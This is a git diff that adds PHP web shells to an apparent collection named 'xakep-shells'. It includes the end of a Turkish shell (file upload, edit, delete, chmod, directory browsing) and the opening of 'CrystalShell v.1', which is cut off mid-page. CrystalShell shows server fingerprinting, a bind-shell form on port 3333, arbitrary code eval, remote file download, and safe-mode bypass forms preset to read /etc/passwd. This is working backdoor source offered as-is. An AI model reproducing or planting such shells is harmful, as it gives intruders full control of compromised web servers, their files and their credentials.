+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klas�r="$path/$kismi";
+                mkdir("$klas�r", 0777) or die ("<center><font color='#0000FF'>Klas�r Olu?turulamyyor</font></center>");
+                echo "<center><font color='#0000FF'>Klas�r Olu?turuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klas�r Ysmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya A�ylamyyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazylamyyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Ba?aryyla D�zenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>D�ZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya A�ylamyyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>d�zenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+echo "<center>------------------------------</center>";
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klas�r�ne Git</a></center>";
+echo "<center><a href='./$this_file?dir=/'>Linux K�k Dizinine Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya G�nder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klas�r Olu?tur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<br>
+      <center>T�m haklary sahibi MafiABoY'a aittir</center>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Crystal.php.txt b/xakep-shells/PHP/Crystal.php.txt
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/xakep-shells/PHP/Crystal.php.txt
@@ -0,0 +1,1127 @@
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+<style type='text/css'> body {	background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
+SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
+{background-color:   #FFFFFF   !important}  input  {background-color:   #303030
+!important} option {  background-color:   #303030   !important}         textarea
+{background-color: #303030 !important} input {color: #1CB081 !important}  option
+{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
+{background-color: #303030 !important} select {font-weight: normal;       color:
+#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
+background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
+0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
+!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
+!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
+!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
+normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
+{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
+color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-weight:bold; font-style: italic;}-->
+  </style>
+  <![endif]-->
+<meta http-equiv=Content-Language content=ar>
+<!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+ <style>
+<!--
+body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
+-->
+</style>
+<style> 
+<!-- 
+#leftright, #topdown{ 
+position:absolute; 
+left:0; 
+top:0; 
+width:1px; 
+height:1px; 
+layer-background-color:limegreen; 
+background-color:red; 
+z-index:100; 
+font-size:1px; 
+} 
+--> 
+</style>
+
+</head>
+  </head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">�</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
+&nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="5" color="#C0C0C0">�</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
+</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="������� ���Php" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2">&nbsp;</font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="�������" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><b><font size="4px">
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font></font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="�������" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font></font><span lang="en-us"><font face="verdana" color="white">
+	<a href="?act=bypass"><font color=#CC0000 size="3">
+<a title="����� ������" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font><font face="verdana" color="white"><span lang="en-us">
+<a title="������� ������ ��������" href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0">�</font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0">�</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
+	</font></b></font><b><font face="verdana" color="white">
+	</b><b>
+	<a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
+<a title="��������" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="��������" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="�������" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
+</font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+	<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size=-2 face=verdana color=#CC0000>server </font>
+	<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+	</font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
+<font size=-2 face=verdana color=white>
+	<font size="4px" face="verdana" color="white">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font face=Verdana size=-2 color="#008000">
+	CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
+	<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
+</font>
+	</b>
+</font></a>&nbsp;&nbsp;<br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+	<font face=Verdana size=-2 color="#CC0000">
+	<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+	<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+	</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+	</font>
+	</a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+</font></font>
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+	</font>
+	<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+	</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+	</font></font>
+	</font>
+	</font>
+	</b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>������ ����� ����� ���� �������<br><br>����� ��������<br>��� ���� �������� ���� ��� ��� ������ ������ ������ ������<br>������ �� ������� ������   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+ echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect �� ������ ��� ����.<br>.- ��� ����� ����� �������� �������<br>.-���� ����� ���� ��� ����� ���<br>nc -lp 3333������ ������ - <br>�������� ���� ������ <br>Bind port to  :<br> bind shell ������ � ��   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>������� ������� �������  Select ------ x  ���� ��� ������<br>.- ���� ���� �����  ������� ����� �� ����� �������<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+	<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+	<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+	<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+	&nbsp;</p>
+	<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+		<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
